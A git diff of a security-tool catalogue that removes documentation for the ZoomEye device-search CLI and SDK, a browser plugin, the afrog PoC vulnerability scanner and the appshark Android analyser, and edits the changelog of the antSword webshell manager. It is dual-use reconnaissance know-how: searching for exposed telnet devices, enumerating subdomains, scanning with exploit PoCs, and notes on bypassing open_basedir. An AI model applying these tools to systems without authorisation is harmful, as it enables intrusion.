-    os          按照操作系统进行统计
-    country     按照国家进行统计
-
-使用 `-facet` 统计全量 `telnet` 设备的应用类型：
-
-```
-$ zoomeye search "telnet" -facet app
-app                                count
-[unknown]                          28317914
-BusyBox telnetd                    10176313
-Linux telnetd                      3054856
-Cisco IOS telnetd                  1505802
-Huawei Home Gateway telnetd        1229112
-MikroTik router config httpd       1066947
-Huawei telnetd                     965378
-Busybox telnetd                    962470
-Netgear broadband router...        593346
-NASLite-SMB/Sveasoft Alc...        491957
-```
-
-使用 `-stat` 统计查询出来的 20 条 `telnet` 设备的应用类型：
-
-```
-$ zoomeye search "telnet" -stat app
-app                                count               
-Cisco IOS telnetd                  7
-[unknown]                          5
-BusyBox telnetd                    4
-Linux telnetd                      3
-Pocket CMD telnetd                 1
-```
-
-#### 6.数据筛选
-
-使用 `-filter` 参数可以查询数据结果集中某个字段的详情，或根据内容进行筛选，该命令支持的字段包括：
-
-    # host/search
-    app          显示应用类型详情
-    version      显示版本信息详情
-    device       显示设备类型详情
-    port         显示端口信息详情
-    city         显示城市详情
-    country      显示国家详情
-    asn          显示as number详情
-    banner       显示特征响应报文详情
-    timestamp    显示数据更新时间
-    *            在包含该符号时，显示所有字段详情
-    
-    # web/search
-    app         显示应用类型详情
-    headers     HTTP 头
-    keywords    meta 属性关键词
-    title       HTTP Title 标题信息
-    site        site 搜索
-    city        显示城市详情
-    country     显示国家详情
-    webapp      Web 应用
-    component   Web 容器
-    framework   Web 框架
-    server      Web 服务
-    waf         Web 防火墙(WAF)
-    os          操作系统
-    timestamp   显示数据更新时间
-    *           在包含该符号时，显示所有字段详情
-
-
-相比较默认情况下的省略显示，所以通过 `-filter` 可以查看完整的数据，如下：
-
-```
-$ zoomeye search "telnet" -num 1 -filter banner
-ip         banner                        
-222.*.*.*  \xff\xfb\x01\xff\xfb\x03\xff\xfd\x03TELNET session now in ESTABLISHED state\r\n\r\n
-
-total: 1
-```
-
-使用 `-filter` 进行筛选时，语法为：`key1,key2,key3=value`，其中 `key3=value` 为筛选条件，而展示的内容为 `key1,key2` 例：
-```
-$ zoomeye search telnet -num 1 -filter port,app,banner=Telnet
-
-ip                        port                          app                           
-240e:*:*:*::3             23                            LANDesk remote management     
-
-total: 1
-```
-
-在上面的示例中：`banner=Telnet` 为筛选的条件，而 `port,app` 为展示的内容。如果需要展示 `banner`，筛选语句则是这样
-
-```
-$ zoomeye search telnet -num 1 -filter port,app,banner,banner=Telnet
-```
-
-
-#### 7.数据导出
-`-save` 参数可以对数据进行导出，该参数的语法和 `-filter` 一样，并将结果按行 json 的格式保存到文件中，如下：
-
-```
-$ zoomeye search "telnet" -save banner=telnet
-save file to telnet_1_1610446755.json successful!
-
-$ cat telnet_1_1610446755.json
-{'ip': '218.223.21.91', 'banner': '\\xff\\xfb\\x01\\xff\\xfb\\x03\\xff\\xfd\\x03TELNET session now in ESTABLISHED state\\r\\n\\r\\n'}
-```
-
->如果使用 `-save` 但不带任何参数，则会将查询结果按照 `ZoomEye API` 的 json 格式保存成文件，这种方式一般用于在保留元数据的情况下进行整合数据；该文件可以作为输入通过 `cli` 再次解析处理，如 `zoomeye search "xxxxx.json"`。
-
-#### 8. 数据图像化
-
-`-figure` 参数为数据图像化参数，该参数提供了 `pie(饼图)` 和  `hist(柱状图)` 两种展示方式，在没有进行指定依旧显示数据，在指定  `-figure` 时，只会显示图形。饼图如下：
-
-![image-20210205004653480](https://github.com/knownsec/ZoomEye-python/raw/master/images/image-20210205004653480.png)
-
-![image-20210205005016399](https://github.com/knownsec/ZoomEye-python/raw/master/images/image-20210205005016399.png)
-
-柱状图如下：
-
-![image-20210205004806739](https://github.com/knownsec/ZoomEye-python/raw/master/images/image-20210205004806739.png)
-
-![image-20210205005117712](https://github.com/knownsec/ZoomEye-python/raw/master/images/image-20210205005117712.png)
-
-> 注意：仅能在 `-facet` 和 `-stat` 数据聚合的情况使用。
-
-#### 9. IP 历史数据查看
-
-`ZoomEye-python` 提供了 IP 历史设备数据查询功能，使用命令 `history [ip]` 便能查询 IP 设备历史数据，使用方式如下：
-
-```
-$zoomeye history "207.xx.xx.13" -num 1
-207.xx.xx.13
-Hostnames:                    [unknown]
-Country:                      United States
-City:                         Lake Charles
-Organization:                 fulair.com
-Lastupdated:                  2021-02-18T03:44:06
-Number of open ports:         1
-Number of historical probes:  1
-
-timestamp                  port/service               app                        raw_data                   
-2021-02-18 03:44:06        80/http                    Apache httpd               HTTP/1.0 301 Moved Permanently...
-```
-
-在默认情况下向用户较为重要的六个字段：
-
-```
-1. time		记录的时间
-2. service	开放的服务
-3. port		端口
-4. app  	Web 应用
-5. banner   原始的指纹信息 
-```
-
-使用 `zoomeye history -h`  可以查看 `history` 提供的参数。
-
-```
-$zoomeye history -h
-
-usage: zoomeye history [-h] [-filter filed=regexp] [-force] ip
-
-positional arguments:
-  ip                    search historical device IP
-
-optional arguments:
-  -h, --help            show this help message and exit
-  -filter filed=regexp  filter data and print raw data detail. field:
-                        [time,port,service,app,raw]
-  -force                ignore the local cache and force the data to be
-                        obtained from the API
-```
-
-下面对 `-filter` 进行演示：
-
-```
-$zoomeye history "207.xx.xx.13" -filter "time=^2019-08,port,service"
-207.xx.xx.13
-Hostnames:                    [unknown]
-Country:                      United States
-City:                         Lake Charles
-Organization:                 fulair.com
-Lastupdated:                  2019-08-16T10:53:46
-Number of open ports:         3
-Number of historical probes:  3
-
-time                       port                       service                    
-2019-08-16 10:53:46        389                        ldap                       
-2019-08-08 23:32:30        22                         ssh                        
-2019-08-03 01:55:59        80                         http 
-```
-
-`-filter` 参数支持以下五个字段的筛选：
-
-```
-1.time      扫描时间
-2.port      端口信息
-3.service   开放的服务
-4.app       Web 应用
-5.banner    原始指纹信息
-6.ssl       证书信息
-7.*         在包含该符号时，显示所有字段详情
-```
-
-在展示时添加了一个 `id` 字段的展示，`id` 为序号，为了方便查看，并不能作为筛选的字段。
-
-> 注意：目前只开放了上述五个字段的筛选。   
-> 使用 `history` 命令时同样会消耗用户配额，在 `history` 命令中返回多少条数据，用户配额就相应扣除多少。例如：IP "8.8.8.8" 共有 944 条历史记录，查询一次扣除 944 的用户配额。
-
-
-#### 10.查询 IP 信息
-可以通过 `zoomeye ip` 命令查询指定 IP 的信息，例如：
-```
-$ zoomeye ip 185.*.*.57
-185.*.*.57
-Hostnames:                    [unknown]
-Isp:                          [unknown]
-Country:                      Saudi Arabia
-City:                         [unknown]
-Organization:                 [unknown]
-Lastupdated:                  2021-03-02T11:14:33
-Number of open ports:         4{2002, 9002, 123, 25}
-
-port      service        app                    banner                        
-9002      telnet                                \xff\xfb\x01\xff\xfb\x0...    
-123       ntp            ntpd                   \x16\x82\x00\x01\x05\x0...    
-2002      telnet         Pocket CMD telnetd     \xff\xfb\x01\xff\xfb\x0...    
-25        smtp           Cisco IOS NetWor...    220 10.1.10.2 Cisco Net...   
-```
-
-`zoomeye ip` 命令同样支持筛选参数 `-filter`, 语法和 `zoomeye search` 的筛选语法一致。例如：
-```
-$ zoomeye ip "185.*.*.57" -filter "app,app=ntpd"
-Hostnames:                    [unknown]
-Isp:                          [unknown]
-Country:                      Saudi Arabia
-City:                         [unknown]
-Organization:                 [unknown]
-Lastupdated:                  2021-02-17T02:15:06
-Number of open ports:         0
-Number of historical probes:  1
-
-app                        
-ntpd              
-```
-
-`filter` 参数支持的字段有:
-
-```
-    port        端口信息
-    service     运行服务
-    app         应用
-    banner      指纹信息
-```
-
-> 注意：此功能根据不同用户等级，对每个用户每天查询次数做了一定的限制。
->
-> **注册用户和开发者每天能够查询 10 次**
-> 
-> **高级用户每天可查询 20 次**
-> 
-> **VIP 用户每天可以查询 30 次**
-> 
-> 每天的次数使用完之后，24小时后刷新，即从第一次查 IP 的时间开始计算，24小时后刷新次数。
-
-
-#### 11.清理功能
-用户每天都会搜索大量的数据，这样就导致缓存文件夹所占的存储空间逐渐增大；如果用户在公共服务器上使用 `ZoomEye-python` 可能会导致自己的 `API KEY` 和 `ACCESS TOKEN` 泄漏。
-为此 `ZoomEye-python` 提供了清理命令 `zoomeye clear`，清理命令可以缓存数据和用户配置进行清空。使用方式如下：
-
-```
-$zoomeye clear -h
-usage: zoomeye clear [-h] [-setting] [-cache]
-
-optional arguments:
-  -h, --help  show this help message and exit
-  -setting    clear user api key and access token
-  -cache      clear local cache file
-```
-
-
-#### 12.缓存机制
-
-`ZoomEye-python` 在 `cli` 模式下提供了缓存机制，位于 `~/.config/zoomeye/cache` 下，尽可能的节约用户配额；用户查询过的数据集将在本地缓存 5 天，当用户查询相同的数据集时，不会消耗配额。
-
-#### 13.域名查询
-`ZoomEye-python` 提供了域名查询功能(包括关联域名查询和子域名查询功能), 使用命令 `domain [域名] [查询类型]` 便能进行域名查询，使用方式如下：
-
-```
-$ python cli.py domain baidu.com 0
-name                                                   timestamp      ip
-zszelle.baidu30a72.bf.3dtops.com                       2021-06-27     204.11.56.48
-zpvpcxa.baidu.3dtops.com                               2021-06-27     204.11.56.48
-zsrob.baidu.3dtops.com                                 2021-06-27     204.11.56.48
-zw8uch.7928.iwo7y0.baidu82.com                         2021-06-27     59.188.232.88
-zydsrdxd.baidu.3dtops.com                              2021-06-27     204.11.56.48
-zycoccz.baidu.3dtops.com                               2021-06-27     204.11.56.48
-...
-
-total: 30/79882
-```
-
-在默认情况下为用户展示较为重要的三个字段：
-```
-1. name             域名全称
-2. timestamp        建立时间戳
-3. ip               ip地址
-```
-
-使用 `zoomeye domain -h` 可以查看 `domain` 提供的参数。
-```
-$ python cli.py domain -h
-usage: zoomeye domain [-h] [-page PAGE] [-dot] q {0,1}
-
-positional arguments:
-  q           search key word(eg:baidu.com)
-  {0,1}       0: search associated domain;1: search sub domain
-
-optional arguments:
-  -h, --help  show this help message and exit
-  -page PAGE  view the page of the query result
-  -dot        generate a network map of the domain name
-```
-
-下面对 `-page` 进行演示：(不指定时默认查询第一页)
-
-```
-$ python cli.py domain baidu.com 0 -page 3
-name                                                   timestamp      ip
-zvptcfua.baidu6c7be.mm.3dtops.com                      2021-06-27     204.11.56.48
-zmukxtd.baidu65c78.iw.3dtops.com                       2021-06-27     204.11.56.48
-zhengwanghuangguanxianjinkaihu.baidu.fschangshi.com    2021-06-27     23.224.194.175
-zibo-baidu.com                                         2021-06-27     194.56.78.148
-zuwxb4.jingyan.baidu.66players.com                     2021-06-27     208.91.197.46
-zhannei.baidu.com.hypestat.com                         2021-06-27     67.212.187.108
-zrr.sjz-baidu.com                                      2021-06-27     204.11.56.48
-zp5hd1.baidu.com.ojsdi.cn                              2021-06-27     104.149.242.155
-
-...
-
-zhidao.baidu.com.39883.wxeve.cn                        2021-06-27     39.98.202.39
-zhizhao.baidu.com                                      2021-06-27     182.61.45.108
-zfamnje.baidu.3dtops.com                               2021-06-27     204.11.56.48
-zjnfza.baidu.3dtops.com                                2021-06-27     204.11.56.48
-
-total: 90/79882
-```
-
-`-dot` 参数可以生成域名和 IP 的网络图，在使用该功能的之前需要安装 `grapvhiz`，安装教程请参考 [grapvhiz](https://graphviz.org/download/) 支持在Windows/Linux/Mac上使用。`-dot` 参数会生成 `png` 格式的图片，同时保存原始 dot 语言脚本。
-
-`-dot`使用效果如下：
-
-![image-20211208112710711](https://github.com/knownsec/ZoomEye-python/raw/master/images/image-20211208112710711.png)
-
-### 0x03 演示视频
-
-[在 Windows、Mac、Linux、FreeBSD 演示视频](https://video.weibo.com/show?fid=1034:4597603044884556)
-
-[![asciicast](https://asciinema.org/a/qyDaJw9qQc7UjffD04HzMApWa.svg)](https://asciinema.org/a/qyDaJw9qQc7UjffD04HzMApWa)
-
-
-### 0x04 使用SDK
-#### 1.初始化token
-同样，在 SDK 中也支持 `username/password` 和 `APIKEY` 两种认证方式，如下：
-
-**1.user/pass**
-
-```python
-from zoomeye.sdk import ZoomEye
-
-zm = ZoomEye(username="username", password="password")
-```
-
-**2.APIKEY**
-
-```python
-from zoomeye.sdk import ZoomEye
-
-zm = ZoomEye(api_key="01234567-acbd-00000-1111-22222222222")
-```
-
-#### 2.SDK API
-以下是 SDK 提供的接口以及说明：
-
-	1.login()
-	  使用 username/password 或者 APIKEY 进行认证
-	2.dork_search(dork, page=0, resource="host", facets=None)
-	  根据 dork 搜索指定页的数据
-	3.multi_page_search(dork, page=1, resource="host", facets=None)
-	  根据 dork 搜索多页数据
-	4.resources_info()
-	  获取当前用户的信息
-	5.show_count()
-	  获取当前 dork 下全部匹配结果的数量
-	6.dork_filter(keys)
-	  从搜索结果中提取指定字段的数据
-	7.get_facet()
-	  从搜索结果中获取全量数据的聚合结果
-	8.history_ip(ip)
-	  查询某个 ip 的历史数据信息
-	9.show_site_ip(data)
-	  遍历 web-search 结果集，并输出域名和ip地址
-	10.show_ip_port(data)
-	  遍历 host-search 结果集，并输出ip地址和端口
-	11.generate_dot(self, q, source=0, page=1)
-		生成以域名中心写出graphviz文件和图片
-
-#### 3.使用示例
-
-```python
-$ python3
->>> import zoomeye.sdk as zoomeye
->>> dir(zoomeye)
-['ZoomEye', 'ZoomEyeDict', '__builtins__', '__cached__', '__doc__',
-'__file__', '__loader__', '__name__', '__package__', '__spec__',
-'fields_tables_host', 'fields_tables_web', 'getpass', 'requests',
-'show_ip_port', 'show_site_ip', 'zoomeye_api_test']
->>> # Use username and password to login
->>> zm = zoomeye.ZoomEye()
->>> zm.username = 'username@zoomeye.org'
->>> zm.password = 'password'
->>> print(zm.login())
-....JIUzI1NiIsInR5cCI6IkpXVCJ9.....
->>> data = zm.dork_search('apache country:cn')
->>> zoomeye.show_site_ip(data)
-213.***.***.46.rev.vo***one.pt ['46.***.***.213']
-me*****on.o****e.net.pg ['203.***.***.114']
-soft********63221110.b***c.net ['126.***.***.110']
-soft********26216022.b***c.net ['126.***.***.22']
-soft********5084068.b***c.net ['126.***.***.68']
-soft********11180040.b***c.net ['126.***.***.40']
-...
-```
-
-#### 4.数据搜索
-如上示例，我们使用 `dork_search()` 进行搜索，我们还可以设置 `facets` 参数，以便获得该 dork 全量数据的聚合统计结果，`facets` 支持的字段请参考 **2.cli使用-4数据聚合**。示例如下：
-
-```python
->>> data = zm.dork_search('telnet', facets='app')
->>> zm.get_facet()
-{'product': [{'name': '', 'count': 28323128}, {'name': 'BusyBox telnetd', 'count': 10180912}, {'name': 'Linux telnetd', ......
-```
-
->`multi_page_search()` 同样也可以进行搜索，当需要获取大量数据时使用该函数，其中 `page` 字段表示获取多少页的数据；而 `dork_search()` 仅获取指定页的数据。
-
-#### 5.数据筛选
-在 SDK 中提供了 `dork_filter()` 函数，我们可以更加方便对数据进行筛选，提取指定的数据字段，如下：
-
-```python
->>> data = zm.dork_search("telnet")
->>> zm.dork_filter("ip,port")
-[['180.*.*.166', 5357], ['180.*.*.6', 5357], ......
-```
-
->由于通过 `web-search` 和 `host-search` 返回的字段不同，在进行过滤时需要填写正确的字段。
->`web-search` 包含的字段有：app / headers / keywords / title / ip / site / city / country
->`host-search` 包含的字段有：app / version / device / ip / port / hostname / city / country / asn / banner
-
-
-<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
-## 项目相关
-
-- 2021-03-23 发布文章[《关于ZoomEye-python更新这件事》](https://paper.seebug.org/1522/)
-- 2021-01-20 发布文章[《ZoomEye-python 使用指南》](https://paper.seebug.org/1461/)
-
-## 最近更新
-
-#### [v2.2.0] - 2023-04-12
-
-**更新**  
-- 移除用户名和密码的认证方式，仅支持 API- KEY 认证
-
-#### [v2.1.1] - 2021-12-14
-
-**更新**  
-- 支持到处 dot 语言脚本，生成域名 IP 指向图，命令行和 sdk 均支持  
-- 添加 domain 参数，支持域名查询功能(包括关联域名查询和子域名查询功能)  
-
-
-<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
diff --git a/detail/ZoomEye-Tools.md b/detail/ZoomEye-Tools.md
deleted file mode 100644
index 1b4bc19b8..000000000
--- a/detail/ZoomEye-Tools.md
+++ /dev/null
@@ -1,56 +0,0 @@
-## Zoomeye-Tools <https://github.com/knownsec/Zoomeye-Tools>
-<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->
-![Language](https://img.shields.io/badge/Language-JS-blue)
-![Author](https://img.shields.io/badge/Author-Knownsec404-orange)
-![GitHub stars](https://img.shields.io/github/stars/knownsec/Zoomeye-Tools.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V0.3.2-red)
-![Time](https://img.shields.io/badge/Join-20200821-green)
-<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
-
-
-ZoomEye Tools provides a variety of functions to assist the use of Zoomeye, including a proview host and many other functions
-
-ZoomEye Tools provides three major functions:
-1、Simple proview function.
-You can get various information about the ip of the current webpage you visit through the browser plug-in. This is a simple and convenient way. If you want to view more information, you can refer to function 2.
-
-2、Detailed information function
-You can click to view details and search for details of the current page URL in ZoomEye
-
-3、ZoomEye search function
-You can quickly search the specified content in ZoomEye by selecting a piece of content, then clicking the right mouse button, and choosing to use ZoomEye to search.
-
-ZoomEye Tools 提供三个主要功能：
-1、简单的proview功能。
-你可以通过浏览器插件获得你访问的当前网页所在ip的各种信息，这是一个简单便捷的方式，如果你想查看更多信息，可以参考功能2。
-
-2、详细信息功能
-你可以通过点击查看详情，在ZoomEye中搜索当前页面URL的详细信息
-
-3、ZoomEye搜索功能
-你可以通过选中一段内容，之后点击鼠标右键，选择使用ZoomEye搜索，即可快速在ZoomEye中查询指定内容。
-
-
-Chrome网上应用商店：
-
-<https://chrome.google.com/webstore/detail/zoomeye-tools/bdoaeiibkccgkbjbmmmoemghacnkbklj>
-
-
-<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
-## 项目相关
-
-
-## 最近更新
-
-#### [v0.3.2] - 2021-12-01
-
-**Add**  
-- 右键查询功能，目前支持ZoomEye和VirusTotal  
-
-**Changed**  
-- ZoomEye preview  优化显示界面，取消登录限制  
-
-**Removed**  
-- ZoomEye minitools
-
-<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
diff --git a/detail/afrog.md b/detail/afrog.md
deleted file mode 100644
index 3fef20c44..000000000
--- a/detail/afrog.md
+++ /dev/null
@@ -1,182 +0,0 @@
-## afrog <https://github.com/zan8in/afrog>
-<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->
-![Language](https://img.shields.io/badge/Language-Golang-blue)
-![Author](https://img.shields.io/badge/Author-zan8in-orange)
-![GitHub stars](https://img.shields.io/github/stars/zan8in/afrog.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V2.7.9-red)
-![Time](https://img.shields.io/badge/Join-20220615-green)
-<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
-
-## What is afrog
-
-afrog is a high-performance vulnerability scanner that is fast and stable. It supports user-defined PoC and comes with several built-in types, such as CVE, CNVD, default passwords, information disclosure, fingerprint identification, unauthorized access, arbitrary file reading, and command execution. With afrog, network security professionals can quickly validate and remediate vulnerabilities, which helps to enhance their security defense capabilities.
-
-## Features
-
-* [x] Open source
-* [x] Fast, stable, with low false positives
-* [x] Detailed HTML vulnerability reports
-* [x] Customizable and stably updatable PoCs
-* [x] Active community exchange group
-
-## Installation
-
-### Prerequisites
-
-- [Go](https://go.dev/) version 1.19 or higher.
-
-you can install it with:
-
-**Binary**
-```sh
-$ https://github.com/zan8in/afrog/releases
-```
-
-**Github**
-```sh
-$ git clone https://github.com/zan8in/afrog.git
-$ cd afrog
-$ go build cmd/afrog/main.go
-$ ./afrog -h
-```
-
-**Go**
-```sh
-$ go install -v https://github.com/zan8in/afrog/cmd/afrog@latest
-```
-
-## Running afrog
-
-By default, afrog scans all built-in PoCs, and if it finds any vulnerabilities, it automatically creates an HTML report with the date of the scan as the filename.
-
-```sh
-afrog -t https://example.com
-```
-
-**Warning occurs when running afrog**
-
-If you see an error message saying:
-```
-[ERR] ceye reverse service not set: /home/afrog/.config/afrog/afrog-config.yaml
-```
-it means you need to modify the [configuration file](#configuration-file).
-
-To execute a custom PoC directory, you can use the following command:
-
-```sh
-afrog -t https://example.com -P mypocs/
-```
-
-Use the command `-s keyword` to perform a fuzzy search on all PoCs and scan the search results. Multiple keywords can be used, separated by commas. For example: `-s weblogic,jboss`.
-
-```sh
-afrog -t https://example.com -s weblogic,jboss
-```
-
-Use the command `-S keyword` to scan vulnerabilities based on their severity level. Severity levels include: `info`, `low`, `medium`, `high`, and `critical`. For example, to only scan high and critical vulnerabilities, use the command `-S high,critical`.
-
-```sh
-afrog -t https://example.com -S high,critical
-```
-
-You can scan multiple URLs at the same time as well.
-
-```sh
-afrog -T urls.txt
-```
-
-## Configuration file
-
-The first time you start afrog, it will automatically create a configuration file called `afrog-config.yaml`, which will be saved in the current user directory under `$HOME/.config/afrog/afrog-config.yaml`.
-
-Here is an example config file:
-
-```yaml
-reverse:
-  ceye:
-    api-key: "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
-    domain: "xxxxxx.ceye.io"
-```
-
-`reverse` is a reverse connection platform used to verify command execution vulnerabilities that cannot be echoed back. Currently, only ceye can be used for verification. To obtain ceye, follow these steps:
-
-- Go to the [ceye.io](http://ceye.io/) website and register an account.
-- Log in and go to the personal settings page.
-- Copy the `domain` and `api-key` and correctly configure them in the `afrog-config.yaml` file.
-
-
-## Json Output (For developers)
-
-### Json
-Optional command: `-json` `-j`, Save the scan results to a JSON file. The JSON file includes the following contents by default: `target`, `fulltarget`, `id`, and `info`. The info field includes the following sub-fields: `name`, `author`, `severity`, `description`, and `reference`. If you want to save both `request` and `response` contents, please use the [-json-all](#jsonall) command parameter.
-
-```sh
-afrog  -t https://example.com -json result.json
-afrog  -t https://example.com -j result.json
-```
-
-::: warning
-The content of the JSON file is updated in real time. However, there is an important note to keep in mind: before the scan is completed, if developers want to parse the file content, they need to add a '`]`' symbol to the end of the file by themselves, otherwise it will cause parsing errors. Of course, if you wait for the scan to complete before parsing the file, this issue will not occur.
-:::
-
-
-### JsonAll
-
-Optional command: `-json-all` `-ja`, The only difference between the `-json-all` and `-json` commands is that `-json-all` writes all vulnerability results, including `request` and `response`, to a JSON file.
-
-```sh
-afrog -t https://example.com -json-all result.json
-afrog -t https://example.com -ja result.json
-```
-
-
-## Screenshot
-
-![](https://github.com/zan8in/afrog/blob/main/images/1.png)
-
-<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
-## 项目相关
-
-- 2023-07-10 发布视频[《404星链计划-afrog：快速稳定的漏洞扫描工具》](https://www.bilibili.com/video/BV1Pz4y177PU/)
-
-## 最近更新
-
-#### [v2.7.9] - 2023-08-20
-
-**更新**  
-- 解决 console 输出内容被转义问题  
-- 解决了使用`go install ..afrog/v2`命令时版本不正确的问题  
-- 新增 24 PoC，共 1105 个 PoC
-
-#### [v2.7.8] - 2023-08-09
-
-**新增**  
-- 引入了 Eye.sh 反链配置项  
-- 增加 -rrl 和 -rc 参数，对反链平台支持的 PoC 进行独立的并发速率控制
-
-#### [v2.7.7] - 2023-07-30
-
-**新增**  
-- 新增 -pedm 参数(POC Execution Duration Monitor/POC执行时长监视器)  
-- 新增 Vulnerability Scanner Breakpoint (漏洞扫描断点)  
-
-**优化**  
-- 优化 arcgis-default-password (ArcGIS默认口令)  
-- 修复 mysql-detect 和 CVE-2023-25573 的误报  
-- 优化 CVE-2023-25157，提升扫描速度
-
-#### [v2.7.5] - 2023-07-23
-
-**优化**  
-- 修复 ecology-filedownloadforoutdoc-sqli 误报问题  
-- 修复 CVE-2023-28432 规则编写错误问题  
-- 修复 CVE-2021-22205 规则编写错误问题
-
-#### [v2.7.2] - 2023-07-12
-
-**更新**  
-- 将反链存活检查改为并发执行  
-- 新增 poc : ecology-filedownloadforoutdoc-sqli  
-- Poc 总数: 1041
-
-<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
diff --git a/detail/antSword.md b/detail/antSword.md
index baebbe98b..41bda8282 100644
--- a/detail/antSword.md
+++ b/detail/antSword.md
@@ -3,7 +3,7 @@
 ![Language](https://img.shields.io/badge/Language-Nodejs-blue)
 ![Author](https://img.shields.io/badge/Author-AntSwordProject-orange)
 ![GitHub stars](https://img.shields.io/github/stars/AntSwordProject/antSword.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V2.1.15-red)
+![Version](https://img.shields.io/badge/Version-V2.1.14-red)
 ![Time](https://img.shields.io/badge/Join-20201120-green)
 <!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
 
@@ -73,34 +73,11 @@
 <!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
 ## 项目相关
 
-- 2022-10-12 发布演示视频[404星链计划开源安全工具演示——antSword](https://www.bilibili.com/video/BV1Jg411h7Pj/)
-- 2022-07-18 发布文章[《AntSword v2.1.15 更新汇总》](https://mp.weixin.qq.com/s/QzbREMp8JaQiP9qo48OyHg)
-- 2021-11-15 发布文章[《蚁剑绕WAF进化图鉴》](https://mp.weixin.qq.com/s/EYP1ANj7pxM8_NX_7R9WjA)
 
 ## 最近更新
 
-#### [v2.1.15] - 2022-07-17
-
+#### [v2.1.15] - 2021-08-27
 **核心**  
-- 修复 PHP/PHP4 当前目录不可写时 bypass open_basedir 失败的 Bug  
-- 新增 PHPRAW/ASPXCSharp/PSWindows 类型  
-
-**数据管理**  
-- 修复 JSP/MySQL类型在表名中有特殊字符时执行异常的 Bug  
-- 新增配置选项「Body 设置为 RAW 模式」  
-
-**文件管理**  
-- 新增 FileHash 计算目标文件 hash 功能  
-
-**后端模块**  
-- 支持自定义 Content-Type, 默认是 form  
-- 支持 WebSocket 连接  
-
-**设置模块**  
-- 优化全局代理设置  
-
-**其他**  
-- 更多详细更新内容，见 release v2.1.15  
-
+- 修复 PHP/PHP4 当前目录不可写时 bypass open_basedir 失败的 Bug
 
 <!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
diff --git a/detail/appshark.md b/detail/appshark.md
deleted file mode 100644
index 0b0be6b57..000000000
--- a/detail/appshark.md
+++ /dev/null
@@ -1,178 +0,0 @@
-## appshark <https://github.com/bytedance/appshark>
-<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->
-![Language](https://img.shields.io/badge/Language-Kotlin-blue)
-![Author](https://img.shields.io/badge/Author-bytedance-orange)
-![GitHub stars](https://img.shields.io/github/stars/bytedance/appshark.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V0.1.2-red)
-![Time](https://img.shields.io/badge/Join-20220914-green)
-<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
-
-## Document Index
-- [1.overview](doc/zh/overview.md)
-- [2.startup](doc/zh/startup.md)
-- [3.how to write rules](doc/zh/how_to_write_rules.md)
-- [4.how to find compliance problems use appshark](doc/zh/how_to_find_compliance_problem_use_appshark.md)
-- [5.a path traversal game](doc/zh/path_traversal_game.md)
-- [6.argument](doc/zh/argument.md)
-- [7.engine config](doc/zh/EngineConfig.md)
-- [8.result](doc/zh/result.md)
-- [9.faq](doc/zh/faq.md)
-
-
-Appshark is a static taint analysis platform to scan vulnerabilities in an Android app.
-
-## Prerequisites
-
-Appshark requires a specific version of JDK
--- [JDK 11](https://www.oracle.com/java/technologies/javase/jdk11-archive-downloads.html). After testing, it does not
-work on other LTS versions, JDK 8 and JDK 16, due to the dependency compatibility issue.
-
-## Building/Compiling AppShark
-
-We assume that you are working in the root directory of the project repo. You can build the whole project with
-the [gradle](https://gradle.org/) tool.
-
-```shell
-$ ./gradlew build  -x test 
-```
-
-After executing the above command, you will see an artifact file `AppShark-0.1.1-all.jar` in the directory `build/libs`.
-
-## Running AppShark
-
-Like the previous step, we assume that you are still in the root folder of the project. You can run the tool with
-
- ```shell
- $ java -jar build/libs/AppShark-0.1.1-all.jar  config/config.json5
- ```
-
-The `config.json5` has the following configuration contents.
-
-```JSON
-{
-  "apkPath": "/Users/apks/app1.apk",
-  "out": "out",
-  "rules": "unZipSlip.json",
-  "maxPointerAnalyzeTime": 600
-} 
-```
-
-Each JSON field is explained below.
-
-- apkPath: the path of the apk file to analyze
-- out: the path of the output directory
-- rules: the path(s) of the rule file(s), can be more than 1 rules
-- maxPointerAnalyzeTime: the timeout duration in seconds set for the analysis started from an entry point
-- debugRule: specify the rule name that enables logging for debugging
-
-If you provide a configuration JSON file which sets the output path as `out` in the project root directory, you will
-find the result file `out/results.json` after running the analysis.
-
-## Interpreting the Results
-
-Below is an example of the `results.json`.
-
-```JSON
-{
-  "AppInfo": {
-    "AppName": "test",
-    "PackageName": "net.bytedance.security.app",
-    "min_sdk": 17,
-    "target_sdk": 28,
-    "versionCode": 1000,
-    "versionName": "1.0.0"
-  },
-  "SecurityInfo": {
-    "FileRisk": {
-      "unZipSlip": {
-        "category": "FileRisk",
-        "detail": "",
-        "model": "2",
-        "name": "unZipSlip",
-        "possibility": "4",
-        "vulners": [
-          {
-            "details": {
-              "position": "<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolderFix1(java.lang.String,java.lang.String)>",
-              "Sink": "<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolderFix1(java.lang.String,java.lang.String)>->$r31",
-              "entryMethod": "<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void f()>",
-              "Source": "<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolderFix1(java.lang.String,java.lang.String)>->$r3",
-              "url": "/Volumes/dev/zijie/appshark-opensource/out/vuln/1-unZipSlip.html",
-              "target": [
-                "<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolderFix1(java.lang.String,java.lang.String)>->$r3",
